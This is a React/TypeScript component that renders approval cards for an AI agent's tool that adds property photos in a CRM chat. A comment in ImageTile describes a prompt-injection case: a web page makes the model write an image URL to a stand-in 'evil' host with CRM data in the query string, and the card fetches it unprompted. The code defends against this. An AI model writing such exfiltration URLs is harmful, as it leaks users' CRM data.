import * as React from 'react';

import { CircularProgress, Collapse, Typography } from '@mui/material';
import {
  Check,
  ChevronRight,
  CircleAlert,
  Images,
  ShieldQuestion,
  X,
} from 'lucide-react';

import {
  ApprovalActions,
  type ApprovalResponseHandler,
  type ToolPart,
  statusOf,
} from '@modules/_shared/components/chat/ApprovalActions';
import { listArtifacts } from '@modules/_shared/components/chat/artifactApi';
import {
  type ArtifactSummary,
  isThumbnailImage,
} from '@modules/_shared/components/chat/artifactFiles';
import { ArtifactThumbnail } from '@modules/_shared/components/chat/ArtifactThumbnail';
import { useArtifactPreview } from '@modules/_shared/components/chat/useArtifactPreview';
import {
  isVisualToolName,
  parseVisualToolOutput,
  visualFilenameOf,
} from '@modules/_shared/components/chat/visualToolOutput';
import { useLocale } from '@shared/hooks/locale';
import { useTheme } from '@shared/theme/theme';

// Specialised card for the crm-chat-api `add_property_images` tool: shows the
// photos the agent wants to add (thumbnails) instead of raw JSON, so the user
// can approve/deny at a glance.
//
// EASY TO REMOVE: delete this file and the single
// `toolName === 'add_property_images'` branch in ChatToolCall.tsx — the
// generic tool card is the automatic fallback.

export const ADD_PROPERTY_IMAGES_TOOL_NAME = 'add_property_images';

// ── Attachment preview lookup ────────────────────────────────────────────────
// The tool references chat images by stable content ID, but the tool part
// carries no image bytes/URLs — those live in the conversation's user-message
// file parts (data URLs while composing, signed GCS URLs from history) and in
// render_visual / generate_image outputs (whose imageId is also a valid
// attachmentId). The chat panel provides an ID → preview lookup via this
// context. An unresolved ID never falls back by filename or position: showing
// the wrong image on an approval card would be worse than showing a clear
// error.
// `url` is null for a visual whose signed link expired: the image still exists
// server-side, so the ID stays resolved and the tile shows a placeholder.
type AttachmentPreview = { url: string | null; filename?: string };
type AttachmentPreviewLookup = (
  attachmentId: string,
) => AttachmentPreview | undefined;

const ChatAttachmentPreviewContext =
  React.createContext<AttachmentPreviewLookup>(() => undefined);

type MessageLike = {
  parts?: Array<{
    type: string;
    url?: string;
    mediaType?: string;
    filename?: string;
    attachmentId?: string;
    state?: string;
    output?: unknown;
  }>;
};

const TOOL_PART_PREFIX = 'tool-';

const indexChatImages = (
  messages: Array<MessageLike>,
): Map<string, AttachmentPreview> => {
  const byId = new Map<string, AttachmentPreview>();
  for (const message of messages) {
    for (const part of message.parts ?? []) {
      if (
        part.type === 'file' &&
        part.attachmentId != null &&
        part.url != null &&
        (part.mediaType ?? '').startsWith('image/')
      ) {
        byId.set(part.attachmentId, {
          url: part.url,
          filename: part.filename,
        });
      } else if (
        part.type.startsWith(TOOL_PART_PREFIX) &&
        isVisualToolName(part.type.slice(TOOL_PART_PREFIX.length)) &&
        part.state === 'output-available'
      ) {
        for (const image of parseVisualToolOutput(part.output).images) {
          byId.set(image.imageId.toLowerCase(), {
            url: image.url,
            filename: visualFilenameOf(image),
          });
        }
      }
    }
  }
  return byId;
};

// Attachment ids whose full-size original is still uploading (see
// originalUploadQueue). Approving before it lands would save the resized copy.
const NO_PENDING_ORIGINALS: ReadonlySet<string> = new Set();
const PendingOriginalUploadsContext =
  React.createContext<ReadonlySet<string>>(NO_PENDING_ORIGINALS);

export const ChatAttachmentPreviewProvider = ({
  messages,
  pendingOriginalIds = NO_PENDING_ORIGINALS,
  children,
}: {
  messages: Array<MessageLike>;
  pendingOriginalIds?: ReadonlySet<string>;
  children: React.ReactNode;
}) => {
  const lookup = React.useMemo<AttachmentPreviewLookup>(() => {
    const byId = indexChatImages(messages);
    return attachmentId => byId.get(attachmentId);
  }, [messages]);
  return (
    <ChatAttachmentPreviewContext.Provider value={lookup}>
      <PendingOriginalUploadsContext.Provider value={pendingOriginalIds}>
        {children}
      </PendingOriginalUploadsContext.Provider>
    </ChatAttachmentPreviewContext.Provider>
  );
};

// ── Tool input/output shapes (mirror crm-chat-api/tools/property-images.ts) ──

type ImageItem = {
  attachmentId?: string;
  // Legacy calls created before stable IDs; displayed as unresolved.
  attachmentFilename?: string;
  // An image in the user's Files: shown from the user's own Files (raster
  // only), and a call with one is never auto-approved.
  artifactId?: string;
  url?: string;
  title?: string;
  isFloorPlan?: boolean;
};

type ToolInput = {
  propertyId?: string;
  images?: Array<ImageItem>;
  cmaReportId?: string;
  setFirstAsCover?: boolean;
};

type ToolOutput = {
  insertedCount?: number;
  coverImageId?: string;
  includePhotosEnabled?: boolean;
  skipped?: Array<{ source?: string; reason?: string }>;
  error?: string;
};

const asRecord = (value: unknown): Record<string, unknown> =>
  typeof value === 'object' && value != null
    ? (value as Record<string, unknown>)
    : {};

export const hasUnresolvedPropertyImageAttachments = (
  inputValue: unknown,
  messages: Array<MessageLike>,
): boolean => {
  const input = asRecord(inputValue) as ToolInput;
  const images = Array.isArray(input.images) ? input.images : [];
  const availableIds = indexChatImages(messages);
  return images.some(item =>
    item.artifactId != null
      ? true
      : item.attachmentId != null
      ? !availableIds.has(item.attachmentId)
      : item.url == null,
  );
};

export const waitsForOriginalUploads = (
  inputValue: unknown,
  pendingIds: ReadonlySet<string>,
): boolean => {
  if (pendingIds.size === 0) {
    return false;
  }
  const input = asRecord(inputValue) as ToolInput;
  const images = Array.isArray(input.images) ? input.images : [];
  return images.some(
    item => item.attachmentId != null && pendingIds.has(item.attachmentId),
  );
};

// Whether the approval card must block Approve for this image. A Files image
// (artifactId) is never matched against the chat, but the server checks it
// belongs to the user, so it can be approved by hand; it still never
// auto-approves (hasUnresolvedPropertyImageAttachments).
export const isImageSourceUnmatched = (
  item: ImageItem,
  lookupAttachment: AttachmentPreviewLookup,
): boolean =>
  item.artifactId != null
    ? false
    : item.attachmentId != null
    ? lookupAttachment(item.attachmentId) == null
    : item.url == null;

// The Files image to show on the approval card: only one of this user's own
// files (from their list, signed with their session, never a URL the model
// wrote) and only a raster image (isThumbnailImage: never SVG). Null leaves
// the tile showing the name or id.
export const filesImageForApproval = (
  artifactId: string,
  files: ReadonlyArray<ArtifactSummary>,
): ArtifactSummary | null => {
  const file = files.find(candidate => candidate.id === artifactId);
  return file != null && isThumbnailImage(file) ? file : null;
};

const useOwnFile = (artifactId: string) => {
  const [file, setFile] = React.useState<ArtifactSummary | null>(null);
  const [name, setName] = React.useState<string | null>(null);
  React.useEffect(() => {
    const controller = new AbortController();
    listArtifacts({ signal: controller.signal })
      .then(files => {
        if (!controller.signal.aborted) {
          setFile(filesImageForApproval(artifactId, files));
          setName(files.find(f => f.id === artifactId)?.name ?? null);
        }
      })
      // No list (offline, files off): the tile keeps the id; the server still
      // checks the file is the user's before adding it.
      .catch(() => {});
    return () => controller.abort();
  }, [artifactId]);
  return { file, name };
};

// A Files image on the approval card: the user sees the photo before
// approving it, like a chat attachment (#25053 review).
const FilesImageTile = ({
  artifactId,
  fallback,
}: {
  artifactId: string;
  fallback: (label: string) => React.ReactNode;
}) => {
  const { file, name } = useOwnFile(artifactId);
  const previews = useArtifactPreview({
    onGone: () => {},
    onFailure: () => {},
    onDownload: () => {},
  });
  if (file == null) {
    return <>{fallback(name ?? artifactId)}</>;
  }
  return (
    <div css={{ width: 72 }}>
      <ArtifactThumbnail
        artifact={file}
        height={72}
        onOpen={() => void previews.preview(file).catch(() => {})}
      />
      {previews.dialogs}
    </div>
  );
};

export const ImageTile = ({ item }: { item: ImageItem }) => {
  const { colors } = useTheme();
  const lookupAttachment = React.useContext(ChatAttachmentPreviewContext);
  const attachment =
    item.attachmentId != null ? lookupAttachment(item.attachmentId) : undefined;
  // Prefer the chat attachment preview whenever attachmentId is set. Models
  // (notably OpenAI) often co-send a junk placeholder url with a valid
  // attachmentId; the backend drops that url on parse, and the execute path
  // already ignores it — the approval thumbnail must match so the user sees
  // the photo that will actually be added. URL-only sources are never loaded
  // as a thumbnail: the model writes that URL, and a prompt-injected web page
  // could make it `https://evil/x.jpg?d=<crm data>`, which the card (open by
  // default on approval) would fetch before the user clicks anything.
  const previewUrl = item.attachmentId != null ? attachment?.url : undefined;
  const label =
    attachment?.filename ??
    item.attachmentFilename ??
    item.attachmentId ??
    item.artifactId ??
    item.url ??
    '';
  // The backend drops a junk url sent next to an id, like for attachmentId.
  const source =
    item.attachmentId == null && item.artifactId == null
      ? parseSourceUrl(item.url)
      : null;
  // URL-only: text, never a request. The host is the part a reviewer checks;
  // the rest of the URL stays visible so the query string isn't hidden.
  if (source != null) {
    const rest = source.href.slice(
      source.href.indexOf(source.host) + source.host.length,
    );
    return (
      <div
        title={source.href}
        css={{
          flexBasis: '100%',
          fontSize: '0.75rem',
          lineHeight: 1.4,
          wordBreak: 'break-all',
          color: colors.grey700,
        }}
      >
        <span css={{ fontWeight: 600, color: colors.grey900 }}>
          {source.host}
        </span>
        <span>{rest}</span>
      </div>
    );
  }
  if (previewUrl != null) {
    return (
      <img
        src={previewUrl}
        alt={label}
        title={label}
        css={{
          width: 72,
          height: 72,
          borderRadius: 6,
          border: `1px solid ${colors.divider}`,
          objectFit: 'cover',
        }}
      />
    );
  }
  const placeholder = (text: string) => (
    <div
      title={text}
      css={{
        width: 72,
        height: 72,
        borderRadius: 6,
        border: `1px solid ${colors.divider}`,
        backgroundColor: colors.grey100,
        display: 'flex',
        flexDirection: 'column',
        alignItems: 'center',
        justifyContent: 'center',
        gap: 4,
        padding: 4,
        overflow: 'hidden',
      }}
    >
      <Images size={16} color={colors.grey500} />
      <span
        css={{
          fontSize: '0.6rem',
          color: colors.grey600,
          maxWidth: '100%',
          overflow: 'hidden',
          textOverflow: 'ellipsis',
          whiteSpace: 'nowrap',
        }}
      >
        {text}
      </span>
    </div>
  );
  if (item.attachmentId == null && item.artifactId != null) {
    return (
      <FilesImageTile artifactId={item.artifactId} fallback={placeholder} />
    );
  }
  return placeholder(label);
};

// Splits a model-proposed image URL for display as text; never fetched.
export const parseSourceUrl = (
  url: string | null | undefined,
): { host: string; href: string } | null => {
  if (url == null) {
    return null;
  }
  try {
    const parsed = new URL(url);
    return { host: parsed.host, href: parsed.href };
  } catch {
    return null;
  }
};

export const AddPropertyImagesToolCard = ({
  part,
  onApprovalResponse,
}: {
  part: ToolPart;
  onApprovalResponse?: ApprovalResponseHandler;
}) => {
  const { colors } = useTheme();
  const { t } = useLocale();
  const status = statusOf(part);
  const [open, setOpen] = React.useState(status === 'approval-requested');
  React.useEffect(() => {
    if (status === 'approval-requested') {
      setOpen(true);
    }
  }, [status]);

  const input = asRecord(part.input) as ToolInput;
  const output = asRecord(part.output) as ToolOutput;
  const images = Array.isArray(input.images) ? input.images : [];
  const lookupAttachment = React.useContext(ChatAttachmentPreviewContext);
  const hasUnresolvedAttachment = images.some(item =>
    isImageSourceUnmatched(item, lookupAttachment),
  );
  const uploadingOriginals = waitsForOriginalUploads(
    part.input,
    React.useContext(PendingOriginalUploadsContext),
  );
  // The tool reports partial failures inside a successful result: `error` is
  // set when nothing was inserted at all.
  const failed =
    status === 'error' || (status === 'done' && output.error != null);

  const label = failed
    ? t('Failed to add photos')
    : status === 'approval-requested'
    ? t('Wants to add photos ({{count}})', { count: images.length })
    : status === 'denied'
    ? t('Add photos to the property')
    : status === 'done'
    ? t('Added photos to the property')
    : t('Adding photos…');

  const statusNode =
    status === 'running' || status === 'approval-responded' ? (
      <CircularProgress size={13} sx={{ color: colors.grey500 }} />
    ) : failed ? (
      <CircleAlert size={14} color={colors.errorText} />
    ) : status === 'approval-requested' ? (
      <ShieldQuestion size={14} color={colors.warningText} />
    ) : status === 'denied' ? (
      <X size={14} color={colors.errorText} />
    ) : (
      <Check size={14} color={colors.green600} />
    );

  const skipped = (output.skipped ?? []).filter(
    item => item.reason != null || item.source != null,
  );

  return (
    <div
      css={{
        border: `1px solid ${colors.divider}`,
        borderRadius: 8,
        backgroundColor: colors.white,
        overflow: 'hidden',
      }}
    >
      <button
        type="button"
        onClick={() => setOpen(o => !o)}
        css={{
          display: 'flex',
          alignItems: 'center',
          gap: 8,
          width: '100%',
          padding: '7px 10px',
          background: 'none',
          border: 'none',
          cursor: 'pointer',
          textAlign: 'left',
          font: 'inherit',
          color: colors.grey700,
        }}
      >
        <ChevronRight
          size={14}
          color={colors.grey500}
          style={{
            transform: open ? 'rotate(90deg)' : 'none',
            transition: 'transform 0.15s ease',
            flexShrink: 0,
          }}
        />
        <Images size={15} color={colors.grey600} style={{ flexShrink: 0 }} />
        <Typography
          variant="body2"
          sx={{ fontWeight: 500, flex: 1, minWidth: 0 }}
          noWrap
        >
          {label}
        </Typography>
        {statusNode}
      </button>
      <Collapse in={open} unmountOnExit>
        <div css={{ padding: '0 10px 10px 10px' }}>
          {images.length > 0 && (
            <div css={{ display: 'flex', flexWrap: 'wrap', gap: 6 }}>
              {images.map((item, index) => (
                <ImageTile key={index} item={item} />
              ))}
            </div>
          )}
          {status === 'approval-requested' && hasUnresolvedAttachment && (
            <Typography
              variant="caption"
              sx={{ display: 'block', mt: 1, color: colors.errorText }}
            >
              {t(
                'One or more photos could not be matched. Deny this request and try again.',
              )}
            </Typography>
          )}
          {status === 'approval-requested' && uploadingOriginals && (
            <Typography
              variant="caption"
              sx={{
                display: 'flex',
                alignItems: 'center',
                gap: 0.75,
                mt: 1,
                color: colors.grey600,
              }}
            >
              <CircularProgress size={11} sx={{ color: colors.grey500 }} />
              {t('Uploading full-size photos…')}
            </Typography>
          )}
          {(input.setFirstAsCover === true || input.cmaReportId != null) &&
            status === 'approval-requested' && (
              <Typography
                variant="caption"
                sx={{ display: 'block', mt: 1, color: colors.grey600 }}
              >
                {input.setFirstAsCover === true
                  ? t('The first photo will become the report cover.')
                  : t('The photos will be added to the report.')}
              </Typography>
            )}
          {status === 'done' && !failed && (
            <Typography
              variant="caption"
              sx={{ display: 'block', mt: 1, color: colors.grey600 }}
            >
              {t('{{count}} photos added', {
                count: output.insertedCount ?? 0,
              })}
              {output.coverImageId != null
                ? ` — ${t('cover image updated')}`
                : ''}
            </Typography>
          )}
          {status === 'denied' && (
            <Typography
              variant="caption"
              sx={{ display: 'block', mt: 1, color: colors.errorText }}
            >
              {t('Denied by user — the change was not executed')}
            </Typography>
          )}
          {/* Raw error / skipped details stay verbatim and screenshot-friendly
              (no-obfuscated-errors). */}
          {(failed || skipped.length > 0) && (
            <pre
              css={{
                margin: '8px 0 0',
                padding: '8px 10px',
                backgroundColor: colors.grey100,
                borderRadius: 6,
                fontSize: '0.75rem',
                lineHeight: 1.5,
                fontFamily: "'Fira Code', 'Consolas', 'Monaco', monospace",
                whiteSpace: 'pre-wrap',
                wordBreak: 'break-word',
                maxHeight: 220,
                overflow: 'auto',
              }}
            >
              {[
                failed ? output.error ?? part.errorText ?? t('Failed') : null,
                ...skipped.map(
                  item => `${item.source ?? '?'}: ${item.reason ?? '?'}`,
                ),
              ]
                .filter(Boolean)
                .join('\n')}
            </pre>
          )}
          {status === 'approval-requested' &&
            part.approval?.id != null &&
            onApprovalResponse != null && (
              <ApprovalActions
                approvalId={part.approval.id}
                onApprovalResponse={onApprovalResponse}
                approveDisabled={hasUnresolvedAttachment || uploadingOriginals}
              />
            )}
        </div>
      </Collapse>
    </div>
  );
};
